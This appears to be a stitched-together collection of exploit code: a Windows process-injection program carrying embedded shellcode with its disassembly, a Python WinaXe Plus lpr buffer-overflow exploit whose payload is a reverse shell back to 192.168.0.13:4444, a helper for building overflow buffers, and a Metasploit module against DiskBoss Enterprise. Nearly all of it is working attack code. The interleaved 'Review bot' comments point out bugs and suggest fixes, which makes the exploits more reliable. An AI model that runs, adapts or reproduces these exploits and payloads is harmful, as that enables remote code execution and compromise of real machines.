a9: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
ac: 48 01 fb add %rdi,%rbx
af: c7 04 24 6d 73 76 63 movl $0x6376736d,(%rsp)
b6: 66 c7 44 24 04 72 74 movw $0x7472,0x4(%rsp)
bd: 48 8d 0c 24 lea (%rsp),%rcx
c1: 48 83 ec 58 sub $0x58,%rsp
c5: ff d3 callq *%rbx
c7: 48 8d 54 24 58 lea 0x58(%rsp),%rdx
cc: c7 02 73 74 72 63 movl $0x63727473,(%rdx)
d2: 66 c7 42 04 6d 70 movw $0x706d,0x4(%rdx)
d8: 48 89 c1 mov %rax,%rcx
db: 66 41 b8 2c 09 mov $0x92c,%r8w
e0: 42 8b 1c 06 mov (%rsi,%r8,1),%ebx
e4: 48 01 fb add %rdi,%rbx
e7: ff d3 callq *%rbx
e9: 49 89 44 24 18 mov %rax,0x18(%r12)
ee: 66 ba f8 02 mov $0x2f8,%dx
f2: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
f5: 48 01 fb add %rdi,%rbx
f8: 48 31 d2 xor %rdx,%rdx
fb: 6a 02 pushq $0x2
fd: 59 pop %rcx
fe: ff d3 callq *%rbx
100: 49 89 c5 mov %rax,%r13
103: 49 83 fd ff cmp $0xffffffffffffffff,%r13
107: 74 60 je 169 <__exit>
109: 66 ba 30 01 mov $0x130,%dx
10d: 41 89 54 24 20 mov %edx,0x20(%r12)
112: 66 ba 60 0e mov $0xe60,%dx
116: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
119: 48 01 fb add %rdi,%rbx
11c: 49 8d 54 24 20 lea 0x20(%r12),%rdx
121: 4c 89 e9 mov %r13,%rcx
124: ff d3 callq *%rbx
126: 48 83 f8 01 cmp $0x1,%rax
12a: 75 3d jne 169 <__exit>
12c: 48 31 d2 xor %rdx,%rdx
12f: 66 ba 68 0e mov $0xe68,%dx
133: 44 8b 3c 16 mov (%rsi,%rdx,1),%r15d
137: 49 01 ff add %rdi,%r15
13a: 48 83 ec 58 sub $0x58,%rsp
000000000000013e <get_pid>:
13e: 49 8d 4c 24 4c lea 0x4c(%r12),%rcx
143: 49 8b 14 24 mov (%r12),%rdx
147: 49 8b 5c 24 18 mov 0x18(%r12),%rbx
14c: ff d3 callq *%rbx
14e: 48 31 d2 xor %rdx,%rdx
151: 48 39 d0 cmp %rdx,%rax
154: 74 24 je 17a <inject>
156: 4c 89 e9 mov %r13,%rcx
159: 49 8d 54 24 20 lea 0x20(%r12),%rdx
15e: 41 ff d7 callq *%r15
161: 48 83 f8 01 cmp $0x1,%rax
165: 74 d7 je 13e <get_pid>
167: c9 leaveq
168: c3 retq
0000000000000169 <__exit>:
169: 48 31 d2 xor %rdx,%rdx
16c: 52 push %rdx
16d: 66 ba a4 04 mov $0x4a4,%dx
171: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
174: 48 01 fb add %rdi,%rbx
177: 59 pop %rcx
178: ff d3 callq *%rbx
000000000000017a <inject>:
17a: 48 31 d2 xor %rdx,%rdx
17d: 52 push %rdx
17e: 41 5a pop %r10
180: 66 41 ba 0c 0e mov $0xe0c,%r10w
185: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
189: 48 01 fb add %rdi,%rbx
18c: 52 push %rdx
18d: 59 pop %rcx
18e: 45 8b 44 24 28 mov 0x28(%r12),%r8d
193: b9 0a 80 84 1e mov $0x1e84800a,%ecx
198: 81 e9 0b 70 65 1e sub $0x1e65700b,%ecx
19e: ff d3 callq *%rbx
1a0: 49 89 c5 mov %rax,%r13
1a3: 49 83 fd ff cmp $0xffffffffffffffff,%r13
1a7: 74 c0 je 169 <__exit>
1a9: 66 ba ff 04 mov $0x4ff,%dx
1ad: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1b0: 48 01 fb add %rdi,%rbx
1b3: 48 83 ec 58 sub $0x58,%rsp
1b7: 4c 89 e9 mov %r13,%rcx
1ba: 48 31 d2 xor %rdx,%rdx
1bd: 4d 8b 44 24 10 mov 0x10(%r12),%r8
1c2: 66 41 b9 ff 2f mov $0x2fff,%r9w
1c7: 49 ff c1 inc %r9
1ca: c6 44 24 20 04 movb $0x4,0x20(%rsp)
1cf: ff d3 callq *%rbx
1d1: 49 89 c6 mov %rax,%r14
1d4: 48 31 d2 xor %rdx,%rdx
1d7: 48 39 d0 cmp %rdx,%rax
1da: 74 8d je 169 <__exit>
1dc: 66 ba 43 05 mov $0x543,%dx
1e0: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1e3: 48 01 fb add %rdi,%rbx
1e6: 48 83 ec 58 sub $0x58,%rsp
1ea: 48 31 d2 xor %rdx,%rdx
1ed: 48 89 54 24 20 mov %rdx,0x20(%rsp)
1f2: 4c 89 e9 mov %r13,%rcx
1f5: 4c 89 f2 mov %r14,%rdx
1f8: 4d 8b 44 24 08 mov 0x8(%r12),%r8
1fd: 4d 8b 4c 24 10 mov 0x10(%r12),%r9
202: ff d3 callq *%rbx
204: 48 83 f8 01 cmp $0x1,%rax
208: 0f 85 5b ff ff ff jne 169 <__exit>
20e: 66 ba a8 02 mov $0x2a8,%dx
212: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
215: 48 01 fb add %rdi,%rbx
218: 48 31 d2 xor %rdx,%rdx
21b: 48 83 ec 58 sub $0x58,%rsp
21f: 4c 89 e9 mov %r13,%rcx
222: 52 push %rdx
223: 52 push %rdx
224: 41 58 pop %r8
226: 66 ba 40 03 mov $0x340,%dx
22a: 44 8b 0c 96 mov (%rsi,%rdx,4),%r9d
22e: 49 01 f9 add %rdi,%r9
231: 5a pop %rdx
232: 4c 89 74 24 20 mov %r14,0x20(%rsp)
237: 4c 89 44 24 28 mov %r8,0x28(%rsp)
23c: 4c 89 44 24 30 mov %r8,0x30(%rsp)
241: ff d3 callq *%rbx
243: e8 21 ff ff ff callq 169 <__exit>
*/
#include<stdio.h>
#include<windows.h>
#include<TlHelp32.h>
#include<string.h>
char shellcode[]="\x4d\x31\xc0\x41\x50\x41\x50\xc7\x04\x24\x65\x78\x70\x6c\xc7\x44\x24\x04\x6f\x72\x65\x72\xc7\x44\x24\x08\x2e\x65\x78\x65\x48\x8d\x0c\x24\x41\x50\x41\x50\x41\x50\xc7\x04\x24\x43\x3a\x5c\x55\xc7\x44\x24\x04\x73\x65\x72\x73\xc7\x44\x24\x08\x5c\x50\x75\x62\xc7\x44\x24\x0c\x6c\x69\x63\x5c\xc7\x44\x24\x10\x69\x6e\x2e\x64\x66\xc7\x44\x24\x14\x6c\x6c\x48\x8d\x14\x24\x66\x41\xb8\x50\x01\x4c\x29\xc4\x4c\x8d\x24\x24\x6a\x18\x41\x58\x49\x89\x0c\x24\x49\x89\x54\x24\x08\x4d\x89\x44\x24\x10\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x52\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\xc7\x04\x24\x6d\x73\x76\x63\x66\xc7\x44\x24\x04\x72\x74\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x8d\x54\x24\x58\xc7\x02\x73\x74\x72\x63\x66\xc7\x42\x04\x6d\x70\x48\x89\xc1\x66\x41\xb8\x2c\x09\x42\x8b\x1c\x06\x48\x01\xfb\xff\xd3\x49\x89\x44\x24\x18\x66\xba\xf8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x6a\x02\x59\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\x60\x66\xba\x30\x01\x41\x89\x54\x24\x20\x66\xba\x60\x0e\x8b\x1c\x16\x48\x01\xfb\x49\x8d\x54\x24\x20\x4c\x89\xe9\xff\xd3\x48\x83\xf8\x01\x75\x3d\x48\x31\xd2\x66\xba\x68\x0e\x44\x8b\x3c\x16\x49\x01\xff\x48\x83\xec\x58\x49\x8d\x4c\x24\x4c\x49\x8b\x14\x24\x49\x8b\x5c\x24\x18\xff\xd3\x48\x31\xd2\x48\x39\xd0\x74\x24\x4c\x89\xe9\x49\x8d\x54\x24\x20\x41\xff\xd7\x48\x83\xf8\x01\x74\xd7\xc9\xc3\x48\x31\xd2\x52\x66\xba\xa4\x04\x8b\x1c\x16\x48\x01\xfb\x59\xff\xd3\x48\x31\xd2\x52\x41\x5a\x66\x41\xba\x0c\x0e\x42\x8b\x1c\x16\x48\x01\xfb\x52\x59\x45\x8b\x44\x24\x28\xb9\x0a\x80\x84\x1e\x81\xe9\x0b\x70\x65\x1e\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\xc0\x66\xba\xff\x04\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x4c\x89\xe9\x48\x31\xd2\x4d\x8b\x44\x24\x10\x66\x41\xb9\xff\x2f\x49\xff\xc1\xc6\x44\x24\x20\x04\xff\xd3\x49\x89\xc6\x48\x31\xd2\x48\x39\xd0\x74\x8d\x66\xba\x43\x05\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x48\x31\xd2\x48\x89\x
54\x24\x20\x4c\x89\xe9\x4c\x89\xf2\x4d\x8b\x44\x24\x08\x4d\x8b\x4c\x24\x10\xff\xd3\x48\x83\xf8\x01\x0f\x85\x5b\xff\xff\xff\x66\xba\xa8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x48\x83\xec\x58\x4c\x89\xe9\x52\x52\x41\x58\x66\xba\x40\x03\x44\x8b\x0c\x96\x49\x01\xf9\x5a\x4c\x89\x74\x24\x20\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\xff\xd3\xe8\x21\xff\xff\xff";
void inject(DWORD );
int main(int i,char *a[])
{
if(i!=2)
{
printf("Usage %s <program name>",a[0]);
return 0;
}
BOOL f=0;
HANDLE snap;
PROCESSENTRY32 pe32;
snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(snap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() Failed."); return 0;
}
pe32.dwSize=sizeof(pe32);
if(!Process32First(snap,&pe32))
{
printf("Process32First() Failed."); return 0;
}
do
{
if(0==strncmp(a[1],pe32.szExeFile,strlen(pe32.szExeFile)))
{
f=TRUE;
break;
}
}while(Process32Next(snap,&pe32));
if(!f)
{
printf("No infomation found about \"%s\" ",a[1]);
}
else
{
printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID);
printf("\nInjecting shellcode");
inject(pe32.th32ProcessID);
}
return 0;
}
void inject(DWORD pid)
{
HANDLE phd,h;
LPVOID shell;
phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
if(phd==INVALID_HANDLE_VALUE)
{
printf("\nOpenProcess() Failed."); return ;
}
shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(shell==NULL)
{
printf("\nVirtualAllocEx() Failed"); return ; CloseHandle(phd);
}
WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
printf("\nInjection successfull\n");
printf("Running Shellcode......\n");
h=CreateRemoteThread(phd,NULL,2046,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
if(h==NULL)
{
printf("Failed to Run Shellcode\n"); return ;
}
}
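Review bot: The error check after OpenProcess() in inject() is wrong: OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE, so a failed open falls through to VirtualAllocEx with a NULL handle; compare against NULL. In the same function the `CloseHandle(phd)` placed after `return ;` is unreachable, the return value of WriteProcessMemory is never checked, and neither the process handle nor the thread handle returned by CreateRemoteThread is closed on the success path. The `strncmp(a[1], pe32.szExeFile, strlen(pe32.szExeFile))` match is case-sensitive and compares only up to the length of the running image name. On the shellcode itself, the values loaded as immediates (832, 587, 190, 920, 922, 297, 899, 1279, 1347, 170) are positions in the kernel32.dll AddressOfFunctions array of the one Windows 7 x64 build it was tested on, not export names or hashes, so the "Tested On" line should state that the code is tied to that exact kernel32.dll build and will resolve the wrong exports on any other; the comment "kenrel32.dll AddressOfFunction" should read "kernel32.dll AddressOfFunctions".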


@ -0,0 +1,64 @@
# Exploit Title: WinaXe Plus 8.7 - lpr remote buffer overflow
# Date: 2017-01-16
# Exploit Author: Peter Baris
# Exploit link: http://www.saptech-erp.com.au/resources/winaxe_lpr.zip
# Software Link: http://www.labf.com/download/winaxep-ok.html
# Version: 8.7
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
# Usage: start this fake LPD daemon, then in WinaXe Plus add a network printer pointing at this host and close the dialog;
# the client connects to TCP 515 and the oversized server response overflows its lpr buffer.
import socket

# WinAxe Plus 8.7 - lpr remote buffer overflow
# Author: Peter Baris
# Tested on Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
# Reverse shell to 192.168.0.13 port 4444, length: 351 bytes, bad characters \x00\x0a\x0d (regenerate for your own LHOST/LPORT)
shell = (b"\xb8\xb1\x79\xd9\xb5\xdb\xdc\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
         b"\x52\x83\xeb\xfc\x31\x43\x0e\x03\xf2\x77\x3b\x40\x08\x6f\x39"
         b"\xab\xf0\x70\x5e\x25\x15\x41\x5e\x51\x5e\xf2\x6e\x11\x32\xff"
         b"\x05\x77\xa6\x74\x6b\x50\xc9\x3d\xc6\x86\xe4\xbe\x7b\xfa\x67"
         b"\x3d\x86\x2f\x47\x7c\x49\x22\x86\xb9\xb4\xcf\xda\x12\xb2\x62"
         b"\xca\x17\x8e\xbe\x61\x6b\x1e\xc7\x96\x3c\x21\xe6\x09\x36\x78"
         b"\x28\xa8\x9b\xf0\x61\xb2\xf8\x3d\x3b\x49\xca\xca\xba\x9b\x02"
         b"\x32\x10\xe2\xaa\xc1\x68\x23\x0c\x3a\x1f\x5d\x6e\xc7\x18\x9a"
         b"\x0c\x13\xac\x38\xb6\xd0\x16\xe4\x46\x34\xc0\x6f\x44\xf1\x86"
         b"\x37\x49\x04\x4a\x4c\x75\x8d\x6d\x82\xff\xd5\x49\x06\x5b\x8d"
         b"\xf0\x1f\x01\x60\x0c\x7f\xea\xdd\xa8\xf4\x07\x09\xc1\x57\x40"
         b"\xfe\xe8\x67\x90\x68\x7a\x14\xa2\x37\xd0\xb2\x8e\xb0\xfe\x45"
         b"\xf0\xea\x47\xd9\x0f\x15\xb8\xf0\xcb\x41\xe8\x6a\xfd\xe9\x63"
         b"\x6a\x02\x3c\x23\x3a\xac\xef\x84\xea\x0c\x40\x6d\xe0\x82\xbf"
         b"\x8d\x0b\x49\xa8\x24\xf6\x1a\x17\x10\xf8\xd7\xff\x63\xf8\xf6"
         b"\xa3\xea\x1e\x92\x4b\xbb\x89\x0b\xf5\xe6\x41\xad\xfa\x3c\x2c"
         b"\xed\x71\xb3\xd1\xa0\x71\xbe\xc1\x55\x72\xf5\xbb\xf0\x8d\x23"
         b"\xd3\x9f\x1c\xa8\x23\xe9\x3c\x67\x74\xbe\xf3\x7e\x10\x52\xad"
         b"\x28\x06\xaf\x2b\x12\x82\x74\x88\x9d\x0b\xf8\xb4\xb9\x1b\xc4"
         b"\x35\x86\x4f\x98\x63\x50\x39\x5e\xda\x12\x93\x08\xb1\xfc\x73"
         b"\xcc\xf9\x3e\x05\xd1\xd7\xc8\xe9\x60\x8e\x8c\x16\x4c\x46\x19"
         b"\x6f\xb0\xf6\xe6\xba\x70\x06\xad\xe6\xd1\x8f\x68\x73\x60\xd2"
         b"\x8a\xae\xa7\xeb\x08\x5a\x58\x08\x10\x2f\x5d\x54\x96\xdc\x2f"
         b"\xc5\x73\xe2\x9c\xe6\x51")

# 0x100299DD - CALL ESP in xwpdllib.dll, written little-endian. 512 bytes of filler reach the saved return address;
# the 32-byte NOP sled and the shellcode follow it on the stack, which is where ESP points when CALL ESP executes.
buffer = b"A" * 512 + b"\xdd\x99\x02\x10" + b"\x90" * 32 + shell

port = 515  # LPD; binding a port below 1024 needs root on Unix-like hosts
s = socket.socket()
ip = '0.0.0.0'
s.bind((ip, port))
s.listen(5)
print('Listening on LPD port: ' + str(port))
while True:
    # The overflow is in the client: every connecting lpr client gets the malicious response
    conn, addr = s.accept()
    conn.send(buffer)
    conn.close()
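The exploit above hard-codes the result of the two things a tester works out first: the distance from the start of the buffer to the saved return address (512) and which bytes the target mangles (\x00\x0a\x0d). The following is an added example, not part of the exploit author's code, showing how that offset is located with a cyclic pattern and how the final buffer is assembled with a bad-character check on every byte that must survive the copy. The offset, the CALL ESP address 0x100299DD and the bad-character set are taken from the exploit above; every function name and the placeholder INT3 shellcode are this example's own.

```python
import string
import struct

# Values from the WinaXe Plus 8.7 exploit above
BAD_CHARS = b"\x00\x0a\x0d"
OFFSET_TO_EIP = 512          # bytes of filler before the saved return address
CALL_ESP = 0x100299DD        # CALL ESP in xwpdllib.dll
NOP_SLED = 32


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique,
    so the value that lands in EIP identifies its offset in the sent buffer."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte pattern space")


def pattern_offset(eip_value, length):
    """Offset in the pattern of the EIP value read from the debugger (an int),
    or -1 if it is not part of the pattern. x86 is little-endian, so the
    register value is reversed before searching."""
    needle = struct.pack("<I", eip_value)
    return cyclic_pattern(length).find(needle)


def find_bad_chars(data, bad=BAD_CHARS):
    """(index, byte) pairs for every byte the target would truncate or mangle."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_overflow(shellcode, offset=OFFSET_TO_EIP, ret=CALL_ESP,
                   nops=NOP_SLED, bad=BAD_CHARS):
    """filler | return address | NOP sled | shellcode, refusing to build a buffer
    whose return address or shellcode contains a bad character."""
    ret_bytes = struct.pack("<I", ret)
    bad_in_ret = find_bad_chars(ret_bytes, bad)
    if bad_in_ret:
        raise ValueError("return address contains bad chars: %r" % bad_in_ret)
    bad_in_sc = find_bad_chars(shellcode, bad)
    if bad_in_sc:
        raise ValueError("shellcode contains bad chars at %r" % bad_in_sc[:5])
    return b"A" * offset + ret_bytes + b"\x90" * nops + shellcode


def describe_layout(buf, offset=OFFSET_TO_EIP, nops=NOP_SLED):
    """Split a built buffer back into its regions for a sanity check before sending."""
    return {
        "filler": buf[:offset],
        "eip": struct.unpack("<I", buf[offset:offset + 4])[0],
        "sled": buf[offset + 4:offset + 4 + nops],
        "shellcode": buf[offset + 4 + nops:],
    }


if __name__ == "__main__":
    # Step 1: send cyclic_pattern(600) instead of "A"s, crash the client, read EIP.
    # 0x31724130 is the constructed value EIP would hold for this pattern at offset 512.
    print("offset to EIP:", pattern_offset(0x31724130, 600))
    # Step 2: assemble the real buffer around a constructed placeholder (four INT3s).
    buf = build_overflow(b"\xcc" * 4)
    print("eip: 0x%08x, total length: %d" % (describe_layout(buf)["eip"], len(buf)))
```

The bad-character check matters for the return address as much as for the shellcode: a CALL ESP whose encoding contained \x0a or \x0d would be cut short by the same line-oriented handling that rules those bytes out of the payload.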

platforms/windows/remote/41079.rb Executable file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
caused by improper bounds checking of the request path in HTTP GET
requests sent to the built-in web server. This module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'vportal', # Vulnerability discovery and PoC
'Gabor Seljan' # Metasploit module
],
'References' =>
[
['EDB', '40869']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x09\x0a\x0d\x20",
'Space' => 2000
},
'Targets' =>
[
[
'Automatic Targeting',
{
'auto' => true
}
],
[
'DiskBoss Enterprise v7.4.28',
{
'Offset' => 2471,
'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
}
],
[
'DiskBoss Enterprise v7.5.12',
{
'Offset' => 2471,
'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Dec 05 2016',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
return Exploit::CheckCode::Vulnerable
elsif res.body =~ /DiskBoss Enterprise/
return Exploit::CheckCode::Detected
end
else
vprint_error('Unable to determine due to a HTTP connection timeout')
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def exploit
mytarget = target
if target['auto']
mytarget = nil
print_status('Automatically detecting the target...')
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
if res.body =~ /DiskBoss Enterprise v7\.4\.28/
mytarget = targets[1]
elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
mytarget = targets[2]
end
end
if !mytarget
fail_with(Failure::NoTarget, 'No matching target')
end
print_status("Selected Target: #{mytarget.name}")
end
sploit = make_nops(21)
sploit << payload.encoded
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit << [mytarget.ret].pack('V')
sploit << rand_text_alpha(2500)
send_request_cgi(
'method' => 'GET',
'uri' => sploit
)
end
end
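Review bot: `Msf::Exploit::Remote::Seh` is included but never used; the exploit overwrites the return address directly with `[mytarget.ret].pack('V')` (the ADD ESP,0x68 # RETN gadget in libpal.dll) and calls none of the SEH helpers, so the include should be dropped or its purpose documented. In `check`, the `else` branch reports "HTTP connection timeout" for any non-200 response, which is misleading for a 401 or 404 from a live server; test `res.nil?` for the timeout case and handle a non-200 `res.code` separately before falling through to `CheckCode::Safe`.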